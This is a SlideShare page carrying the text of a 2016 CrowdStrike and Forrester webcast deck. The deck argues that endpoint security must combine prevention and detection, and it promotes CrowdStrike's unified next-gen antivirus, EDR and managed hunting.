SlideShare uma empresa Scribd logo

You Can't Stop The Breach Without Prevention And Detection

CrowdStrike
CrowdStrike

The document discusses the need for a balanced approach to endpoint security that includes both prevention and detection. It argues that relying solely on prevention is not sufficient, as attacks will always get through, requiring detection capabilities to identify breaches. Likewise, detection alone is insufficient, as preventing attacks upfront reduces workload. The document outlines the key components needed to properly unify next-generation antivirus and endpoint detection and response, including complete visibility of endpoint activity, large-scale analysis capacity, and the ability to derive insights and indicators of attack from collected data. An integrated approach is advocated that allows prevention and detection to strengthen one another.

Tecnologia
1 de 45
Baixar para ler offline
2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. YOU CAN’T STOP THE BREACH WITHOUT PREVENTION AND DETECTION CHRIS SHERMAN, SENIOR ANALYST, FORRESTER ROD MURCHISON, VP, PRODUCT MANAGEMENT, CROWDSTRIKE
Mastering the Endpoint: Leverage Forrester’s Targeted Attack Hierarchy Of Needs Chris Sherman, Senior Analyst October 20th, 2016
© 2016 Forrester Research, Inc. Reproduction Prohibited 3 The 90’s called, they want their endpoint security strategy back Despite… Anti-Virus Application patching 80% 63% 48% 42% of breaches involved a software exploit over the past year a 19% increase in costs associated with cyberattacks Y-Y Base: 671 IT and IT security practitioners. Source: Ponemon 2013 State of the Endpoint Survey Base: 881 IT Security Decision Makers. Source: Forrester BT Security Survey, Q3 2015 …Many organizations still rely heavily on antivirus. A New Approach Is Needed! 48% Application control 55% 53% Endpoint Visibility & Control
© 2016 Forrester Research, Inc. Reproduction Prohibited 4 Organizations Must Refocus Their Endpoint Security Strategies
© 2016 Forrester Research, Inc. Reproduction Prohibited 5 The Targeted-Attack Hierarchy Of Needs
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 1: An Actual Security Strategy
© 2016 Forrester Research, Inc. Reproduction Prohibited 7 Expense in Depth
© 2016 Forrester Research, Inc. Reproduction Prohibited 8 Return on Expense in Depth?
© 2016 Forrester Research, Inc. Reproduction Prohibited 9 Components of a sound strategy › Adopt principals of the Zero Trust model › Data driven security not alert driven security › Data driven security is really business driven security which is supported by executives
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 2: A Dedication To Recruiting And Retaining Staff
© 2016 Forrester Research, Inc. Reproduction Prohibited 11 Double down on higher education › There is intense competition between the emerging cyber programs › Make them more competitive; join advisory board drive curriculum that produces capable graduates
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 3: A Focus On The Fundamentals
© 2016 Forrester Research, Inc. Reproduction Prohibited 13 A Focus On The Fundamentals
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 4: An Integrated Portfolio That Enables Orchestration
© 2016 Forrester Research, Inc. Reproduction Prohibited 15 Friction? › “Create friction for the attacker. Slow them down and make their job more difficult.” › What about all the friction we create for ourselves? › Most orgs don’t have the resources to automate their InfoSec processes.
© 2016 Forrester Research, Inc. Reproduction Prohibited 16 What can you do? › Invest in software development staff › Prioritize vendors that integrate and automate between the endpoint and network layers › Pay attention to vendors who see the need and are developing solutions.
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 5: Prevention
© 2016 Forrester Research, Inc. Reproduction Prohibited 18 Prevention is shifting › Traditional approaches to prevention will continue › If you can prevent an action, why not? › Prevention with threat intelligence • Command and Control indicators should be used to prevent communications
© 2016 Forrester Research, Inc. Reproduction Prohibited 19 Prevention begins and ends with attack surface reduction Photo credit: Jan Stromme, Bloomberg Business
© 2016 Forrester Research, Inc. Reproduction Prohibited Targeted-Attack Hierarchy Of Needs Need No. 6: Detection & Response
© 2016 Forrester Research, Inc. Reproduction Prohibited 21 Detection › Detection is the only option when dealing with higher tier adversaries › No single control is your breach detection system › Your aggregate controls and your people are your breach detection system
© 2016 Forrester Research, Inc. Reproduction Prohibited 22 Response › Once you have identified malicious activity, how do you respond? › Is your remediation a reimage? › Time to containment and remediation will never improve without automated response
© 2016 Forrester Research, Inc. Reproduction Prohibited 23 To be successful, an endpoint security strategy must balance prevention with detection
© 2016 Forrester Research, Inc. Reproduction Prohibited 24 Prevention Detection Control / Remediation Endpoint Security Requires A Balanced Approach
© 2016 Forrester Research, Inc. Reproduction Prohibited 25 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates Endpoint Security Requires A Balanced Approach
© 2016 Forrester Research, Inc. Reproduction Prohibited 26 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required Endpoint Security Requires A Balanced Approach
© 2016 Forrester Research, Inc. Reproduction Prohibited 27 Prevention Detection Control / Remediation • Addresses attack surface • Limits time spent on detection/response • Doesn’t require frequent updates • Endpoint visibility and integration • Catches what gets through • Threat intelligence required • Automated/assisted remediation reduces friction • Ensures policy compliance • Operationalizes threat intelligence Endpoint Security Requires A Balanced Approach
© 2016 Forrester Research, Inc. Reproduction Prohibited 28 Recommendations › Choose prevention technologies based on your risk appetite and impact to user experience. › Look to expand your detection capabilities beyond malicious process identification and IOC identification › Reduce your attack surface through a balance of prevention, detection, and remediation proficiency.
THE YING & YANG OF ENDPOINT PROTECTION § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice-versa § You need to have a vision, from the outset to build this, you can’t just make this up as you go along PREVENTIONDETECTION
Cloud Delivered Endpoint Protection MANAGED HUNTING ENDPOINT DETECTION AND RESPONSE NEXT-GEN ANTIVIRUS CrowdStrike is the only security technology provider to unify next-gen AV and EDR into a single agent, backed by 24/7 proactive threat hunting – all delivered via the cloud 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
PREVENTIONBENEFITS PREVENTS ALL TYPES OF ATTACKS Protect against Known/Unknown Malware Protect Against Zero-Day Attacks Eliminate Ransomware No Signature Updates No User Impact—Less than 1% CPU overhead Reduce re-imaging time and costs BUSINESS VALUE Machine Learning IOA Behavioral Blocking Block Known Bad Exploit Mitigation 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
CLASSIC EDR JUSTIFICATION: THERE IS NO SUCH THING AS 100% PREVENTION § Attacks will always get through § Even with 99% efficacy you still need something to deal with the 1% § So, you need EDR to deal with this and solve the ‘silent failure’ problem 1% missed 99% stopped 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHAT 99% CAN MEAN… 33 Chanceofatleastonesuccess foradversary Number of attempts 1% >99% 500 Bottom line: change the binary 500 times and with 99% detection efficacy - you will get one file thru
PREVENT AGAINST SILENT FAILURE DVR FOR ENDPOINT BUSINESS VALUE 5 Second Enterprise Search No Hardware or Storage Costs Full Spectrum Visibility Reduced Time to Remediation BENEFITS 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. DETECTION AND RESPONSE
FINDING THE ADVERSARY So You Don’t Have To BREACH PREVENTION SERVICES Team of Hunters Working for You 24 x 7 BUSINESS VALUE Force Multiplier Community Immunity BENEFITS Reduce Alert Fatigue: Focus on What Matters! Stop the “Mega” Breach 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. MANAGED HUNTING
SO YOU GOT DETECTION AND PREVENTION, WHY ARE YOU STILL DISAPPOINTED? § You can’t just slam two things together - detection & prevention § You can’t just tick a list of features where you check-off features § This is tough stuff, you need to be thoughtful and considered in how you architect a prevention and detection solution § You can’t see prevention and EDR as two separate things 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
SO, WHERE DOES PREVENTION END & DETECTION START? 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. PREVENTIONDETECTION
OVERVIEW OF WHAT’S REQUIRED TO PROPERLY UNIFY NEXT-GEN AV AND EDR 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. Complete and accurate visibility Analysis capacity 1 2 3 Ability to turn data into information and insight
COMPLETE AND ACCURATE VISIBILITY § Data: Need lot’s of it § Scalability: In the Cloud § Power: Storage, throughput and compute power § Integrity: High fidelity § Usefulness: Insightful § Flexible Capture: distributed/mobile/ BYOD and or on/off network 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
ANALYSIS CAPACITY § Organize and analyze big data § You need to analyze this at massive scale § You need to ‘glue’ all this data together § That’s why a ‘Graph’ is the answer 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
ABILITY TO TURN DATA INTO INFORMATION AND INSIGHT § Piecing data together and establishing the relationships between drives ‘Context’ - the more data you have the ‘richer the context’ § Understanding context let’s you understand behavior and that allows you to get to IOA THREAT GRAPH Indicators of Attack EDR 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
WHICH IN TURN MAKES BOTH PREVENTION AND EDR BETTER § IOA’s = better ‘prevention’ § IOA’s = defeat attackers who are ‘living of the land’ § Traditional malware and security approaches inadequate § IOA’s = better EDR and better EDR = better IOA’s
SUMMARY § You need to see Prevention & Detection in a holistic way § There needs to be a virtuous approach - one feeds the other and vice-versa § You need to have a vision, from the outset to build this, you can’t just make this up as you go along
NEW FORRESTER WAVE The Forrester Wave™: Endpoint Security, Q4 2016 The 15 Providers That Matter Most And How They Stack Up § CrowdStrike will be sending a copy to ALL webcast registrants 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
Q&A 2016 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. crowdcasts@crowdstrike.com

Recomendados

State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
CrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
CrowdStrike
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint Security
CrowdStrike
 
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike
 
Crowdstrike .pptx
Crowdstrike .pptxCrowdstrike .pptx
Crowdstrike .pptx
uthayakumar174828
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats
Nevada County Tech Connection
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
Adam Barrera
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 

Recomendados

State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
CrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
CrowdStrike
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint Security
CrowdStrike
 
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike
 
Crowdstrike .pptx
Crowdstrike .pptxCrowdstrike .pptx
Crowdstrike .pptx
uthayakumar174828
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats
Nevada County Tech Connection
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
Adam Barrera
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Katie Nickels
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
Threat Modeling In 2021
Threat Modeling In 2021Threat Modeling In 2021
Threat Modeling In 2021
Adam Shostack
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
CrowdStrike
 
FireEye Solutions
FireEye SolutionsFireEye Solutions
FireEye Solutions
Prime Infoserv
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
Blueinfy Solutions
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
Ahmad Haghighi
 
Introduction to threat_modeling
Introduction to threat_modelingIntroduction to threat_modeling
Introduction to threat_modeling
Prabath Siriwardena
 
Next-Gen security operation center
Next-Gen security operation centerNext-Gen security operation center
Next-Gen security operation center
Muhammad Sahputra
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
MITRE ATT&CK
 
Security operation center
Security operation centerSecurity operation center
Security operation center
MuthuKumaran267
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
OWASP Delhi
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
Sqrrl
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 
Building Security Operation Center
Building Security Operation CenterBuilding Security Operation Center
Building Security Operation Center
S.E. CTS CERT-GOV-MD
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
MITRE ATT&CK
 
A case for Managed Detection and Response
A case for Managed Detection and ResponseA case for Managed Detection and Response
A case for Managed Detection and Response
Digital Transformation EXPO Event Series
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended
Larry Vandenaweele
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
Ahmed Ayman
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
Priyanka Aash
 
Optimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to SuccessOptimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to Success
Sirius
 
Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning
CrowdStrike
 
Bear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsBear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence Operations
CrowdStrike
 

Mais conteúdo relacionado

Mais procurados

Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
CrowdStrike
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
MITRE ATT&CK
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
MITRE ATT&CK
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended
Larry Vandenaweele
 
Optimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to SuccessOptimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to Success
Sirius
 

Mais procurados (20)

Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Threat Modeling In 2021
Threat Modeling In 2021Threat Modeling In 2021
Threat Modeling In 2021
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
 
FireEye Solutions
FireEye SolutionsFireEye Solutions
FireEye Solutions
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
 
Introduction to threat_modeling
Introduction to threat_modelingIntroduction to threat_modeling
Introduction to threat_modeling
 
Next-Gen security operation center
Next-Gen security operation centerNext-Gen security operation center
Next-Gen security operation center
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
 
Security operation center
Security operation centerSecurity operation center
Security operation center
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
 
Building Security Operation Center
Building Security Operation CenterBuilding Security Operation Center
Building Security Operation Center
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
 
A case for Managed Detection and Response
A case for Managed Detection and ResponseA case for Managed Detection and Response
A case for Managed Detection and Response
 
The journey to ICS - Extended
The journey to ICS - Extended The journey to ICS - Extended
The journey to ICS - Extended
 
Security operation center (SOC)
Security operation center (SOC)Security operation center (SOC)
Security operation center (SOC)
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
 
Optimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to SuccessOptimizing Security Operations: 5 Keys to Success
Optimizing Security Operations: 5 Keys to Success
 

Destaque

Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning
CrowdStrike
 
Bear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsBear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence Operations
CrowdStrike
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing Intelligence
CrowdStrike
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
CrowdStrike
 
Fighting advanced malware using machine learning (English)
Fighting advanced malware using machine learning (English)Fighting advanced malware using machine learning (English)
Fighting advanced malware using machine learning (English)
FFRI, Inc.
 
Illusions vs Reality - BSIDES SF
Illusions vs Reality - BSIDES SFIllusions vs Reality - BSIDES SF
Illusions vs Reality - BSIDES SF
Jason Truppi
 
BSides 2016 Presentation
BSides 2016 PresentationBSides 2016 Presentation
BSides 2016 Presentation
Angelo Rago
 
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of BootkitsI/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
CrowdStrike
 
The Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local UsersThe Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local Users
Tal Be'ery
 

Destaque (20)

Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning
 
Bear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsBear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence Operations
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing Intelligence
 
Be Social. Use CrowdRE.
Be Social. Use CrowdRE.Be Social. Use CrowdRE.
Be Social. Use CrowdRE.
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the Hash
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
 
Java Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging JavaJava Journal & Pyresso: A Python-Based Framework for Debugging Java
Java Journal & Pyresso: A Python-Based Framework for Debugging Java
 
Venom
Venom Venom
Venom
 
SplunkLive Brisbane Splunking the Endpoint
SplunkLive Brisbane Splunking the EndpointSplunkLive Brisbane Splunking the Endpoint
SplunkLive Brisbane Splunking the Endpoint
 
Fighting advanced malware using machine learning (English)
Fighting advanced malware using machine learning (English)Fighting advanced malware using machine learning (English)
Fighting advanced malware using machine learning (English)
 
Five Reasons to Look Beyond Math-based Next-Gen Antivirus
Five Reasons to Look Beyond Math-based Next-Gen AntivirusFive Reasons to Look Beyond Math-based Next-Gen Antivirus
Five Reasons to Look Beyond Math-based Next-Gen Antivirus
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
Illusions vs Reality - BSIDES SF
Illusions vs Reality - BSIDES SFIllusions vs Reality - BSIDES SF
Illusions vs Reality - BSIDES SF
 
BSides 2016 Presentation
BSides 2016 PresentationBSides 2016 Presentation
BSides 2016 Presentation
 
Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics
 
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of BootkitsI/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
I/O, You Own: Regaining Control of Your Disk in the Presence of Bootkits
 
The Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local UsersThe Enemy Within: Stopping Advanced Attacks Against Local Users
The Enemy Within: Stopping Advanced Attacks Against Local Users
 
CrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas AttackCrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas Attack
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016
 
Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted Threats
 

Semelhante a You Can't Stop The Breach Without Prevention And Detection

Maturing Endpoint Security: 5 Key Considerations
Maturing Endpoint Security: 5 Key ConsiderationsMaturing Endpoint Security: 5 Key Considerations
Maturing Endpoint Security: 5 Key Considerations
Sirius
 
ISF Congress 2016 - Session 7.2_Kukreja
ISF Congress 2016 - Session 7.2_KukrejaISF Congress 2016 - Session 7.2_Kukreja
ISF Congress 2016 - Session 7.2_Kukreja
Puneet Kukreja
 
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie AheadRethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
OpenDNS
 
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby DominguezThe Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
EC-Council
 
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber AttackWebinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Aujas
 
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptxLogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
LogRhythm_-_Modern_Cyber_Threat_Pandemic.pptx
CNSHacking
 

Semelhante a You Can't Stop The Breach Without Prevention And Detection (20)

Maturing Endpoint Security: 5 Key Considerations
Maturing Endpoint Security: 5 Key ConsiderationsMaturing Endpoint Security: 5 Key Considerations
Maturing Endpoint Security: 5 Key Considerations
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
For Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdf
For Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdfFor Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdf
For Public_ Cybersecurity_ Frameworks, Fundamentals, and Foundations 2023.pdf
 
The Prescription for Protection - Avoid Treatment Errors To The Malware Problem
The Prescription for Protection - Avoid Treatment Errors To The Malware ProblemThe Prescription for Protection - Avoid Treatment Errors To The Malware Problem
The Prescription for Protection - Avoid Treatment Errors To The Malware Problem
 
Threat Detection as presented at the 2016 DGI Cyber security Conference
Threat Detection as presented at the 2016 DGI Cyber security ConferenceThreat Detection as presented at the 2016 DGI Cyber security Conference
Threat Detection as presented at the 2016 DGI Cyber security Conference
 
ISF Congress 2016 - Session 7.2_Kukreja
ISF Congress 2016 - Session 7.2_KukrejaISF Congress 2016 - Session 7.2_Kukreja
ISF Congress 2016 - Session 7.2_Kukreja
 
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie AheadRethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
Rethinking Cyber-Security: 7 Key Strategies for the Challenges that Lie Ahead
 
Security and Automation: Can they work together? Can we survive if they don't?
Security and Automation: Can they work together? Can we survive if they don't?Security and Automation: Can they work together? Can we survive if they don't?
Security and Automation: Can they work together? Can we survive if they don't?
 
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby DominguezThe Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
 
Data Science Transforming Security Operations
Data Science Transforming Security OperationsData Science Transforming Security Operations
